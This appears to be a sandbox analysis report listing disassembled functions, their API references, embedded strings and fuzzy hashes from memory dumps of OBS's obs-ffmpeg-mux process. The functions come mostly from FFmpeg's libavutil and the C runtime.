Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strlen
String ID: %d.%06d$%d:%02d.%06d$%lld:%02d:%02d.%06d$INT64_MAX$INT64_MIN
API String ID: 39653677-2240581584
Opcode ID: cf4f16006c1c0a862bb4f663b07b40e742fc65853bf7fc4d11485ba963f2ff38
Instruction ID: 79e83db062b0bafcbd7ceeac5f2926a1bc4a843916639d3245d72a15acb16509
Opcode Fuzzy Hash: cf4f16006c1c0a862bb4f663b07b40e742fc65853bf7fc4d11485ba963f2ff38
Instruction Fuzzy Hash: DB413AD1B1AB8959EF74CF2658052BD55C2DB98BD0E84C132EF1E47BD5DE3CA305A280

Function 00007FF8BFBA1920 Relevance: 9.1, APIs: 6, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFBA5530: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF8BFBA1688), ref: 00007FF8BFBA5552

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFBA1980
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFBA19DE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFBA1A07
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFBA1A1C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BFBA1A73
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BFBA1A86

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno$free
String ID:
API String ID: 4247730083-0
Opcode ID: 34b5fe769a158e21acccb4ad1b5a9f683f14a6e55ea9ebd6d8c1efb0b3076924
Instruction ID: c7d26729e88d75461bfc298023cd1c01e39105573b6dea05ce6b1f8aa4cdf5a1
Opcode Fuzzy Hash: 34b5fe769a158e21acccb4ad1b5a9f683f14a6e55ea9ebd6d8c1efb0b3076924
Instruction Fuzzy Hash: F1513132A08B0796EA60DBA9D54017933A4FF587D4F444132DB6D83AE5EF3CE865CB40

Function 00007FF8BFB862D0 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

__unDName.LIBVCRUNTIME ref: 00007FF8BFB86326
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BFB86369
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8BFB86393
InterlockedPushEntrySList.KERNEL32 ref: 00007FF8BFB863B0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BFB863BC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BFB863C5

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
String ID:
API String ID: 3741236498-0
Opcode ID: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
Instruction ID: 249528ff6a78341969894b47dafc18f895e69e16cdd8170a2934eea86c48cd1c
Opcode Fuzzy Hash: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
Instruction Fuzzy Hash: 2031C721B1975191EB11DF6EA8045696395FF89FD4F554539DF2D03391EE3DD842C300

Function 00007FF8BFBA3AB0 Relevance: 9.1, APIs: 6, Instructions: 66threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF8BFBA3B29
GetCurrentProcess.KERNEL32 ref: 00007FF8BFBA3B35
GetCurrentThread.KERNEL32 ref: 00007FF8BFBA3B3E
GetCurrentProcess.KERNEL32 ref: 00007FF8BFBA3B47
DuplicateHandle.KERNEL32 ref: 00007FF8BFBA3B6C

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Current$ProcessThread$DuplicateHandle
String ID:
API String ID: 4285418203-0
Opcode ID: 122369a1c330d7f29e53f35644df85b62e1c336a8a69c3fc79a39b0e983c8277
Instruction ID: ec7ecd8647a7c9c5d36bd2b17eb8c3195fce1fec8ef33a0e0e01d57ca755d4ea
Opcode Fuzzy Hash: 122369a1c330d7f29e53f35644df85b62e1c336a8a69c3fc79a39b0e983c8277
Instruction Fuzzy Hash: 02317032908BC18AE7209FA9E8012AAB7A0FF947C4F444134EF8D06B55DF3DE1A58700

Function 00007FF8BFBA5C10 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF8BFBA5C22
OpenProcess.KERNEL32 ref: 00007FF8BFBA5C36
GetLastError.KERNEL32 ref: 00007FF8BFBA5C41
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFBA5C57
CloseHandle.KERNEL32 ref: 00007FF8BFBA5C72
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFBA5C7C

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Process_errno$CloseCurrentErrorHandleLastOpen
String ID:
API String ID: 3861255796-0
Opcode ID: e8f9237df677979dc71b34d724e04c16cd4c67e5f51f945e8c435fea502eb581
Instruction ID: 80e948a72df1a9fa954222cc11e914580c86b9634a587e087c86c0c1b09ddd7a
Opcode Fuzzy Hash: e8f9237df677979dc71b34d724e04c16cd4c67e5f51f945e8c435fea502eb581
Instruction Fuzzy Hash: BC015222F0860282EB654BADB48422963A1EF88B90F455138DB2E47BD4DE3CDD948700

Function 00007FF8A7BE8250 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 196stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF8A7BE828B
strftime.MSVCRT ref: 00007FF8A7BE832A

Strings

[truncated strftime output], xrefs: 00007FF8A7BE840E, 00007FF8A7BE8421, 00007FF8A7BE84F1

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strftimestrlen
String ID: [truncated strftime output]
API String ID: 1668665056-4273287863
Opcode ID: 48fee134cde3df212bc8b5240acc974637bc91c92b5dcb55f0befaaa1fd8cc70
Instruction ID: a66bf5255f89ca8b77e29370561cdbb37d480a057a543a45f8413896ca24951a
Opcode Fuzzy Hash: 48fee134cde3df212bc8b5240acc974637bc91c92b5dcb55f0befaaa1fd8cc70
Instruction Fuzzy Hash: 2071F7B2B06A515AEB15CE29D88863D2391EF887D4F559235DE1A833D1FE3CEC46E300

Function 00007FF8BFB838A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB86710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB8239E), ref: 00007FF8BFB8671E

EncodePointer.KERNEL32 ref: 00007FF8BFB83918
_CallSETranslator.LIBVCRUNTIME ref: 00007FF8BFB83963
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB83B91

Strings

RCC, xrefs: 00007FF8BFB83934
MOC, xrefs: 00007FF8BFB8392C

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
Instruction ID: 63e9f83e9745564b36c61e2f7a5fdbdb6dc08a974d6ae15da47fa6655f2275af
Opcode Fuzzy Hash: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
Instruction Fuzzy Hash: 5D916F73A087958AE750CFA9E4802AD7BA0F7847C8F14412AEF8D17756DF38D1A5C700

Function 00007FF8A7C013C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A7C015FB
_aligned_free.MSVCRT ref: 00007FF8A7C01633

Strings

Picture size %ux%u is invalid, xrefs: 00007FF8A7C01649
Formats with a palette require a minimum alignment of 4, xrefs: 00007FF8A7C01604

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_freememset
String ID: Formats with a palette require a minimum alignment of 4$Picture size %ux%u is invalid
API String ID: 4139559148-2772728507
Opcode ID: d2bce35dc7bea88bc8b002da499a7abb22af52d3ac8cced75f3b84996035a56c
Instruction ID: 81bec43c1089d0f777cccf6063a90b30e553180d46294e1279086b25057f802e
Opcode Fuzzy Hash: d2bce35dc7bea88bc8b002da499a7abb22af52d3ac8cced75f3b84996035a56c
Instruction Fuzzy Hash: 5E612966B0AB8267EB048F15D90477EA692FF857D4F448131EE4E477D8DE3CE4429780

Function 00007FF8A7C21850 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 172COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7C21AF8

Part of subcall function 00007FF8A7C9AF60: CreateEventA.KERNEL32 ref: 00007FF8A7C9AFE2
Part of subcall function 00007FF8A7C9AF60: Sleep.KERNEL32 ref: 00007FF8A7C9AFF7

Strings

nb_threads >= 0, xrefs: 00007FF8A7C21AD4
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C21AE4
src/libavutil/slicethread.c, xrefs: 00007FF8A7C21ACD
j, xrefs: 00007FF8A7C21AEB

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CreateEventSleepabort
String ID: Assertion %s failed at %s:%d$j$nb_threads >= 0$src/libavutil/slicethread.c
API String ID: 723382662-4085466978
Opcode ID: 0dd97ee1e1389a45ab9eeccc6ffecfb3266947cce79cf5f2d17546453878bf81
Instruction ID: 2e3c1bd9b7d8d5dd95b9f82c9198bfdaef8a1cb3804a333c8b81686009fa6f4f
Opcode Fuzzy Hash: 0dd97ee1e1389a45ab9eeccc6ffecfb3266947cce79cf5f2d17546453878bf81
Instruction Fuzzy Hash: 04719F72A0AB82A6EB64AF11E5403AE73A2FB847C4F144131DA8D47785DF3CE511D781

Function 00007FF8BFB8BB70 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8BC50

Part of subcall function 00007FF8BFB88C24: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8913D
Part of subcall function 00007FF8BFB88C24: DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB89175

Strings

std::nullptr_t , xrefs: 00007FF8BFB8BDC5
std::nullptr_t, xrefs: 00007FF8BFB8BDF1
volatile, xrefs: 00007FF8BFB8BBE2, 00007FF8BFB8BD30
volatile , xrefs: 00007FF8BFB8BBD3, 00007FF8BFB8BD21

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
Instruction ID: cfd1ac9df379a15da2fe8860f10ebb50dc7aaee042009b7310938672b75bc096
Opcode Fuzzy Hash: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
Instruction Fuzzy Hash: 6F716872A08A4694EB148FACD9411BC67A5BB857C4F44C539DB4E07BAADF3CE650C700

Function 00007FF8BFB63660 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

av_get_packed_sample_fmt.AVUTIL-58 ref: 00007FF8BFB63693
av_get_packed_sample_fmt.AVUTIL-58 ref: 00007FF8BFB6369E
av_get_bytes_per_sample.AVUTIL-58 ref: 00007FF8BFB6386F
av_log.AVUTIL-58 ref: 00007FF8BFB638CE

Strings

Requested noise shaping dither not available at this sampling rate, using triangular hp dither, xrefs: 00007FF8BFB638BF

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_get_packed_sample_fmt$av_get_bytes_per_sampleav_log
String ID: Requested noise shaping dither not available at this sampling rate, using triangular hp dither
API String ID: 3201340904-3665241142
Opcode ID: 3aabd3796ad4e8e3c28a21a01194fa0efc64d4ec367513780e46d480d1dae623
Instruction ID: f68d18d4486c553c6b5f79ba28ab711b040937992fa552a0d29443b33e99b788
Opcode Fuzzy Hash: 3aabd3796ad4e8e3c28a21a01194fa0efc64d4ec367513780e46d480d1dae623
Instruction Fuzzy Hash: 89612533E18A8659E752CB7C89417B9F395BF597C4F088332DB0E66390EF6DA4A5C600

Function 00007FF8BFB83690 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB86710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB8239E), ref: 00007FF8BFB8671E

EncodePointer.KERNEL32 ref: 00007FF8BFB836DC
_CallSETranslator.LIBVCRUNTIME ref: 00007FF8BFB8372B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB8389F

Strings

RCC, xrefs: 00007FF8BFB836F9
MOC, xrefs: 00007FF8BFB836F0

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
Instruction ID: 2acbb592e27071bed484ddf7126a03528cd763ea83e5ac7af000430b36879a92
Opcode Fuzzy Hash: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
Instruction Fuzzy Hash: 2D613777A08A858AE724CFA9D4807AD77A0FB84BC8F184125EF4D13B5ADF38E465C700

Function 00007FF8BFB63000 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF8BFB630A0
_errno.MSVCRT ref: 00007FF8BFB630F0

Strings

exp, xrefs: 00007FF8BFB630C6, 00007FF8BFB6310B, 00007FF8BFB63145

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID: exp
API String ID: 2918714741-113136155
Opcode ID: e892162a4feb91c5f06d0adc05f7b2a5d8b4b961a27d821f26560dc97cede207
Instruction ID: 6daacfd21e1c04d6320fff3906ecd900d432ae7e1316f0ea02a4b46d2eab533d
Opcode Fuzzy Hash: e892162a4feb91c5f06d0adc05f7b2a5d8b4b961a27d821f26560dc97cede207
Instruction Fuzzy Hash: 8851FC53D0CA85A2E7025F78D81227BB320FF95384F54D325EB8D31696FF1DE5949A40

Function 00007FF8A7C8D620 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF8A7C8D6C0
_errno.MSVCRT ref: 00007FF8A7C8D710

Strings

exp, xrefs: 00007FF8A7C8D6E6, 00007FF8A7C8D72B, 00007FF8A7C8D765

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID: exp
API String ID: 2918714741-113136155
Opcode ID: e90ec1942e2a92b2f1d0ed0121cc3710e2463ace097223b5873384d11cd1195e
Instruction ID: 0a8d9b5151757534f84dd1a5dfa0a271ce80e918f9f958f68d58793ebd192999
Opcode Fuzzy Hash: e90ec1942e2a92b2f1d0ed0121cc3710e2463ace097223b5873384d11cd1195e
Instruction Fuzzy Hash: BB510652D0DA85A2E7026F34E81227E6364FF9A384F50D331EB8D3059AFF2DE5919B40

Function 00007FF8A7BE9750 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

pool->alloc || pool->alloc2, xrefs: 00007FF8A7BE98D0
Assertion %s failed at %s:%d, xrefs: 00007FF8A7BE98E6
src/libavutil/buffer.c, xrefs: 00007FF8A7BE98C9

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: Assertion %s failed at %s:%d$pool->alloc || pool->alloc2$src/libavutil/buffer.c
API String ID: 0-4265094632
Opcode ID: d76ba869af0c935bc261349364afef7ac018e203dbb1c970f62eb4bb728a1136
Instruction ID: baf7c83bb1c5287bd7c52f938db61ef1bed420212774ca000b225983c570e275
Opcode Fuzzy Hash: d76ba869af0c935bc261349364afef7ac018e203dbb1c970f62eb4bb728a1136
Instruction Fuzzy Hash: 38517AB6606B41A5EB659F11E8487AE33A8FB48BC9F454135DE8E07390EF3CE449D381

Function 00007FF8A7C06510 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7C066C3

Strings

duration >= 0, xrefs: 00007FF8A7C066D7
in_ts != ((int64_t)0x8000000000000000ULL), xrefs: 00007FF8A7C066A7
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C066B3
src/libavutil/mathematics.c, xrefs: 00007FF8A7C06698, 00007FF8A7C066C8

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
